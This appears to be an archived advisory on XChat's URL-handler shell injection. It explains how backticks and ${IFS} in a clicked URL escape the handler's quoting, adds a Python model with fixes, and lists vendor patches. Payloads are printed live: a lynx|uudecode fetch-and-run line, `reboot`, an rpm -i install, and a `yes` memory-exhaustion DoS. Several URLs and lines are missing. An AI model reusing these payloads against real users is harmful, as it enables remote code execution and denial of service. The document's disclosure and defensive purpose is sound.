

Xchat possible root hack





    Zenith Parsec found the following.  Just to show what we mean about
    the possible danger, start Netscape and enter in xchat (in a channel
    or query window) the following URL:

        '`lynx${IFS}-dump${IFS}|uudecode;./thingee`'

    Right click on it, and select the Netscape (Existing) or  Netscape
    (New Window) option.   Wait until the  URL loads.   In a shell  on
    your machine type

        tail -2 ~/.bash_profile

        echo You've been hax0red
        echo --zen

    (oops... should've been You\'ve been hax0red, but u get the  idea)
    Lucky it wasn't  a script that  was well written,  and designed to
    use script kiddie stuff to hack root or something, eh?

    For the  non-lazy and  the lazy  who were  impressed by  the quick

    The hole is in the URL Handler section.  Each handler is a command
    template: XChat replaces %s with the selected URL and hands the
    result to a shell.  Netscape (Existing) causes XChat to run the
    command

        netscape -remote 'openURL(%s)'

    where the %s is replaced by the selected URL, e.g.:

    causes the command

        netscape -remote 'openURL('

    which opens that page.  Netscape (Run New) causes XChat to run the
    command netscape %s, and so on.

    Backticks and shell expansion.  Imagine someone types:

        l00k @ d15 k3w1 w@r3z  5173!`date`y='`date`'

    With the (Existing) or (New Window) options, and any other handler
    that puts %s inside single quotes in the style of 'openURL(%s)', you
    get:

        netscape -remote 'openURL(`date`y='`date`')'

    Count the single quotes: the one before the second `date` closes the
    quote that the template opened, so the second `date` is no longer
    quoted and the shell runs it; the quote after it reopens the string,
    so the rest of the command still parses.

    With the (Run New) type commands (that is, command %s, with no single
    quotes around the %s) you get:


    which has the first `date` unquoted (no single quotes around it), and
    so it executes.  In real life, though, it's unlikely anyone would
    click on a URL like


    though.  Still, not all that useful, eh?  Well, URLs can get pretty
    long.  For example, a cgi-bin call to something can get quite long.

    Compare that to:

        `reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

    At a quick glance there is nothing wrong with it.

    Well, you seem to have a limitation, in that putting spaces in
    doesn't work, nor does redirection.

    Well, you can put spaces in.  The $IFS variable is probably set;
    ${IFS} expands to the shell's field separator (space, tab and newline
    by default), so the words on either side of it are split apart just
    as if a space had been typed.  And who needs redirection when you
    can do this:

        '"`rpm${IFS}-i${IFS}`"'

    (For (Existing) or (New Window))

        "`rpm${IFS}-i${IFS}`"

    By the way, a way to exploit this that's not too blatant, if you
    don't mind just DoS-ing the victim, is something like

        `yes`

    (Warning: following said URL in xchat will eat all the memory you
    are allowed to eat on your system, and thus tends to crash
    poorly-configured Linux systems.  The shell has to collect the whole
    output of a backticked command before it can substitute it, and yes
    never stops writing.)
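    To make the quoting argument concrete, the following is an added
    example (not XChat's own code; XChat is written in C, this model is
    Python).  It performs the same %s substitution as the two handler
    templates quoted above, lexes the result with the shell's quoting
    rules to list which metacharacters are live, and shows three fixes:
    escaping the embedded single quote for a template whose %s already
    sits inside quotes, quoting the whole URL for a bare %s, and the
    proper fix of substituting into an argument vector that is exec'd
    with no shell at all.  The templates are the ones in the text; the
    sample URLs are the page's payloads plus one constructed benign URL
    under the example.invalid domain.

```python
"""Model of the XChat URL-handler bug: the selected URL is spliced into a
command template that is then handed to /bin/sh.  Added example for this
page, not XChat's code; the templates are the ones the text quotes, the
sample URLs are the page's payloads or constructed for illustration."""
import shlex

# Handler templates quoted in the text.
EXISTING = "netscape -remote 'openURL(%s)'"   # Netscape (Existing)
RUN_NEW = "netscape %s"                        # Netscape (Run New)

# Characters that make the shell do something other than pass bytes along.
SPECIAL = set("`$|;&<>()")


def build_command(template, url):
    """The vulnerable step: plain textual substitution of %s, after which
    the whole string is lexed by the shell."""
    return template.replace("%s", url)


def unquoted_metachars(cmd):
    """Lex cmd the way a POSIX shell handles quoting and report every
    metacharacter that is live.  Inside '...' nothing is special; inside
    "..." backticks and $ still expand; a backslash outside single quotes
    protects the next character.  Returns a list of (index, char)."""
    live = []
    state = None            # None, "'" or '"'
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if state == "'":
            if ch == "'":
                state = None
        elif ch == "\\":
            i += 1          # escaped character, never special
        elif state == '"':
            if ch == '"':
                state = None
            elif ch in "`$":
                live.append((i, ch))
        elif ch in "'\"":
            state = ch
        elif ch in SPECIAL:
            live.append((i, ch))
        i += 1
    return live


def escape_for_single_quotes(url):
    """Fix for a template whose %s already sits inside single quotes: the
    only character that can break out is ', so rewrite it as '\\''
    (close the quotes, one backslash-escaped quote, reopen)."""
    return url.replace("'", "'\\''")


def build_command_quoted(template, url):
    """Fix for a template with a bare %s: shlex.quote wraps the URL so the
    shell sees exactly one word whatever it contains."""
    return template.replace("%s", shlex.quote(url))


def build_argv(template_argv, url):
    """Best fix: substitute into an argument vector and exec it directly
    (execvp, or subprocess.run(argv) without shell=True).  No shell ever
    lexes the URL, so its quotes and backticks are just bytes."""
    return [arg.replace("%s", url) for arg in template_argv]


if __name__ == "__main__":
    url = "`date`y='`date`'"           # the page's quote-escape payload
    for tpl in (EXISTING, RUN_NEW):
        cmd = build_command(tpl, url)
        print(cmd, "->", unquoted_metachars(cmd))
    print(build_command(EXISTING, escape_for_single_quotes(url)))
    print(build_command_quoted(RUN_NEW, url))
    print(build_argv(["netscape", "-remote", "openURL(%s)"], url))
```

    Run against the page's `date` payload, the lexer flags exactly the
    second `date` for the (Existing) template and the first for (Run
    New), which is the argument made above in code; the ${IFS} payload
    is flagged too, because inside the double quotes it carries,
    backticks and $ still expand.  Note also that the bare netscape %s
    template mangles ordinary URLs: an unquoted & in a query string
    backgrounds the command, a second reason to quote the URL or, better,
    never let a shell see it.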


    It seems that this bug will only affect XChat versions 1.3.9 and
    above, up to and including 1.4.2 (the devel series may also be
    vulnerable, as there is no mention of this bug on the changelog
    page).  Release 1.3.9 was the first to have editable URL handlers,
    which seem to be the cause.  Verified bug exists on [x]chat

    Version 1.2.1 of xchat does not appear to be vulnerable.

    For Red Hat:


    For Linux-Mandrake:


    For Conectiva Linux:

    Just to chime in here: for distributions that haven't released an
    update, the source for 1.4.2 is available on the author's website
    here for the impatient:

    The latest stable release of debian is not vulnerable. Others:

    Slackware 7.1 does ship with xchat.  It is not vulnerable.

    An  essential  update  is  available  immediately from Helix Code,
    Inc.   via the  Helix GNOME  Updater and  from the following URLs.
    For Caldera OpenLinux eDesktop 2.4 systems:

    For Debian GNU/Linux potato (2.2) and woody systems:

    For LinuxPPC systems:

    For Linux Mandrake systems:

    For Red Hat Linux systems:

    For Solaris running on UltraSparc systems:

    For SuSE 6.3 systems:

    For SuSE 6.4 systems:

    For TurboLinux systems:

    For Linux-Mandrake:

        Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm

    For FreeBSD:

    Users of Slackware 7.0, 7.1, and -current are urged to upgrade to
    the xchat.tgz package available in the Slackware -current

    For TurboLinux:

    Note:  You  must  rebuild  and  install  the  RPM if you choose to
    download and install the SRPM.   Simply installing the SRPM  alone
